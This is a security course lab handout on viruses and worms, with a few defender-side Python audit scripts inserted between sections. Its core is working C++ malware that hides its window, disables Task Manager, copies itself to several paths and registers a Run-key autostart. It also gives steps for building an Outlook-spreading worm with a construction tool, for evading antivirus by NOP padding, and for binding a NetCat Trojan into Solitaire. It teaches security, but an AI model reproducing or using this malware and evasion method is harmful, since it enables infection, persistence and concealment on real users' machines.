Virus and Worms: Objectives
Computer Virus:
The first phase, in which the virus inserts itself into a file, is called the
insertion phase. The second phase, in which it performs some action, is
called the execution phase. The following pseudocode fragment shows
how a simple computer virus works.
    beginvirus:
        if spread-condition then begin
            for some set of target files do begin
                if target is not infected then begin
                    determine where to place virus instructions
                    copy instructions from beginvirus to endvirus into target
                    alter target to execute added instructions
                end;
            end;
        end;
        perform some action(s)
        goto beginning of infected program
    endvirus:
As this code indicates, the insertion phase must be present but need not
always be executed. For example, a virus that infects boot files would
check for an uninfected boot file (the spread-condition in the
pseudocode) and, if one was found, would infect that file (the set of
target files).
Internet Security ECOM 5347 Lab 14 Viruses & Worms
Types of Viruses
Parasitic virus: The traditional and still most common form of virus. A
parasitic virus attaches itself to executable files and replicates, when the
infected program is executed, by finding other executable files to infect.
Phage virus: a phage virus modifies and alters other programs and
databases, infecting all of these files. The only way to remove
this virus is to reinstall the programs that are infected. If you miss even a
single instance of this virus on the victim system, the process will start
again and infect the system once more.
Worms
A worm is a program that can replicate itself and send copies from
computer to computer across network connections. Upon arrival, the
worm may be activated to replicate and propagate again. In addition to
propagation, the worm usually performs some unwanted function. Early
worms filled up memory and bred inside the RAM of the target
A worm is different from a virus in that it can reproduce itself, it is
self-contained, and it does not need a host application to be transported.
Many of the so-called viruses that have made the papers and media
were, in actuality, worms and not viruses. However, it’s possible for a
worm to contain or deliver a virus to a target system.
Logic Bomb
The logic bomb is code embedded in some legitimate program that is set
to "explode" when certain conditions are met and performs an action
that violates the security policy. Examples of conditions that can be used
as triggers for a logic bomb are the presence or absence of certain files,
a particular day of the week or date, or a particular user running the
application. Once triggered, a bomb may alter or delete data or entire
files, cause a machine halt, or do some other damage.
Example:
In the attack depicted in Figure 2.20, the logic bomb sends a message
back to the attacking system that it has loaded successfully. The victim
system can then be used to initiate an attack such as a DDoS attack, or it
can grant access at the time of the attacker’s choosing.
Figure 3
Antivirus Approaches
Lab Experiment
Requirements:
We need only one machine in this experiment to build our malicious code and
run it.
Procedures:
Part 1: Writing your virus (using C++):
Code:
    #include <windows.h>
    #include <iostream>
    using namespace std;
    int main()
    {
        //----------------1--------------------
        AllocConsole();
        ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 0);
        //----------------2--------------------
        HKEY hKey;
        unsigned char reg[2] = "1";
        RegCreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system", &hKey);
        RegSetValueEx(hKey, "disabletaskmgr", 0, REG_DWORD, reg, sizeof(reg));
        RegCloseKey(hKey);
        //------------------3------------------
        char windir[MAX_PATH];
        HKEY hKey2;
        char pathname[256];
        GetWindowsDirectory(windir, sizeof(windir));
        HMODULE gMh = GetModuleHandle(0);
        GetModuleFileName(gMh, pathname, 256);
        strcat(windir, "\\system32\\code.exe");
        CopyFile(pathname, windir, 0);
        unsigned char omg[45] = windir+"";
        if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey2) == EXIT_SUCCESS)
        {
            RegSetValueEx(hKey2, "Code", 0, REG_SZ, omg, sizeof(omg));
            RegCloseKey(hKey2);
        }
        else
        {
            RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey2);
            RegSetValueEx(hKey2, "Code", 0, REG_SZ, omg, sizeof(omg));
            RegCloseKey(hKey2);
        }
        //------------------4------------------
        char path[MAX_PATH];
        HMODULE GetModH = GetModuleHandle(NULL);
        GetModuleFileName(GetModH, path, 255);
        CopyFile(path, "C:\\code.exe", FALSE);
        system("pause");
        return 0;
    }
For the above code (each number below corresponds to the numbered comment in
the code):
1- This part hides the console window that would normally be displayed when
the program is run.
2- This part creates a new registry value named disabletaskmgr under the key
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system in
HKEY_CURRENT_USER to disable Task Manager (Ctrl+Alt+Delete); we assign the
value 1 to the new registry value.
RegCreateKey creates the key and RegSetValueEx sets the value under the
specified key.
3- In this part we copy our malicious code to a path from which it can be run at
startup. We get the path of the Windows folder using the
GetWindowsDirectory method, obtain the module's file name using
GetModuleFileName, and copy it to the system32 folder in the Windows directory
using the CopyFile method; then we create a registry value under
Software\\Microsoft\\Windows\\CurrentVersion\\Run so that this
code runs when the computer starts or a user logs on.
4- In the last part we copy our code to different paths so that it is
difficult to erase. To spread your virus code further you can add more
CopyFile statements.
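As an added illustration (not part of the lab handout), the same changes viewed from the defender's side: a Python audit over an offline snapshot of the registry and file system that flags the DisableTaskMgr policy, the Run-key entry, and identical copies of one executable at more than one path. The snapshot format and the sample values are constructed assumptions, not real system data.

```python
import hashlib
from collections import defaultdict

# Registry locations the handout's sample writes to (paths from the lab text).
POLICY_KEY = r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
RUN_KEYS = (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
            r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run")

def audit(registry, files):
    """registry: {key_path: {value_name: data}}, files: {path: file_bytes}.
    Both are offline snapshots in an assumed format; returns (category, detail)."""
    findings = []
    # 1. Task Manager disabled by policy (value names are case-insensitive).
    policy = {k.lower(): v for k, v in registry.get(POLICY_KEY, {}).items()}
    if str(policy.get("disabletaskmgr", 0)).strip("\x00") not in ("0", ""):
        findings.append(("policy", f"DisableTaskMgr set under {POLICY_KEY}"))
    # 2. Autorun targets from both Run keys, keyed by lower-cased path.
    autoruns = {}
    for key in RUN_KEYS:
        for name, command in registry.get(key, {}).items():
            autoruns[command.strip('"').lower()] = f"{key}\\{name}"
    # 3. Identical executables at several paths (the sample copies itself to
    #    system32\code.exe and C:\code.exe so that one deletion is not enough).
    by_hash = defaultdict(list)
    for path, data in files.items():
        by_hash[hashlib.sha256(data).hexdigest()].append(path)
    for paths in by_hash.values():
        if len(paths) < 2:
            continue
        findings.append(("copies", sorted(paths)))
        for path in paths:
            if path.lower() in autoruns:
                findings.append(("autorun", f"{autoruns[path.lower()]} -> {path}"))
    return findings

# Constructed snapshot mirroring the state the handout's code leaves behind.
SAMPLE_BODY = b"MZ constructed sample executable"
SAMPLE_REGISTRY = {
    POLICY_KEY: {"disabletaskmgr": 1},
    RUN_KEYS[0]: {"Code": r"C:\Windows\system32\code.exe"},
}
SAMPLE_FILES = {
    r"C:\Windows\system32\code.exe": SAMPLE_BODY,
    r"C:\code.exe": SAMPLE_BODY,
    r"C:\Windows\notepad.exe": b"MZ some other program",
}

if __name__ == "__main__":
    for category, detail in audit(SAMPLE_REGISTRY, SAMPLE_FILES):
        print(category, detail)
```

On a live Windows host the two snapshots would be filled from winreg and a directory walk; the policy finding is removed by deleting the value, and every path in a "copies" finding must go before the autorun entry is cleared.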
Figure 4
Figure 5
- If you want to spread your worm via Outlook (if your victim uses Outlook), you
can set a message title and body from the Outlook Options; in the same way
you can configure other spreading options such as P2P.
- Now choose the action you want to perform from the list in
Payload Options; let us choose Run File/Link and type www.iugaza.edu.ps.
The payload options available in this tool are listed in figure 6.
Figure 6
- The last thing is to determine when your action will take place, from Payload
Trigger Options (figure 7); you can choose "on execution" as an example; then
click "construct worm".
Figure 7
- When you run the resultant worm, the result is as shown in figure 8.
Figure 8
Stealth Tools:
We can use this tool to hide viruses, malware and Trojans from antivirus
software.
- First of all, determine the file you want to use as the virus.
- Add Bytes: this adds white bytes (NOP instructions); it is useful for throwing
off antivirus software. Figure 9 shows the interface of this tool and a simple
configuration of the Add Bytes option.
Test the file size before and after adding the NOP operations.
Open the produced file in any text editor and look for the NOP operations.
Figure 9
- Another method to hide your malicious code is binding the file with another
executable file to create a single executable file, as shown in figure 10.
Figure 10
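As an added example (not from the lab or from the tool), the measurement the two questions about Add Bytes ask for, in Python: how much the file grows, that the plain whole-file hash changes, and that a hash computed after stripping the trailing NOP run still matches, which is why a scanner should not key a signature on a whole-file checksum. The sample bytes are constructed, not a real executable.

```python
import hashlib

NOP = 0x90  # x86 "no operation" opcode; the Add Bytes option appends runs of it

def trailing_run(data, byte=NOP):
    """Length of the run of `byte` at the very end of `data`."""
    n = 0
    while n < len(data) and data[-1 - n] == byte:
        n += 1
    return n

def padding_insensitive_sha256(data, byte=NOP):
    """SHA-256 of the file with any trailing NOP run removed, so a checksum
    keyed on this value is not defeated by appended padding. A production
    scanner would parse the PE headers and hash the sections instead; this
    overlay heuristic is enough to show the idea."""
    return hashlib.sha256(data[:len(data) - trailing_run(data, byte)]).hexdigest()

def compare(original, padded):
    """The measurements the lab asks for: size growth, whether the plain file
    hash changed, and whether the normalised hash still matches."""
    return {
        "size_delta": len(padded) - len(original),
        "trailing_nops": trailing_run(padded),
        "plain_hash_changed": (hashlib.sha256(original).digest()
                               != hashlib.sha256(padded).digest()),
        "normalised_hash_same": (padding_insensitive_sha256(original)
                                 == padding_insensitive_sha256(padded)),
    }

# Constructed stand-in for an executable (a real PE file also starts with "MZ").
ORIGINAL = b"MZ constructed sample program body"
PADDED = ORIGINAL + bytes([NOP]) * 1024   # the file after "Add Bytes"

if __name__ == "__main__":
    print(compare(ORIGINAL, PADDED))
```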
Eliterwrap Tool:
Another tool we can use to hide executable files is eliterwrap; this tool allows
you to hide an executable file (malicious code: a Trojan or virus) inside a legitimate
one, such as the solitaire game.
With this tool we can embed a tool such as NetCat (refer to the NetCat lab) together
with another executable file, and we specify the command to execute when the file
is run in the "Enter command line" step.
Figure 11 shows hiding a Trojan named patch with Spider Solitaire to produce an
executable file named play.exe.
Figure 11
Exercise:
Write a virus in C++ that disables regedit and runs at startup; hide your
code using any method. In your opinion, what is the most effective way to hide the
code from antivirus detection?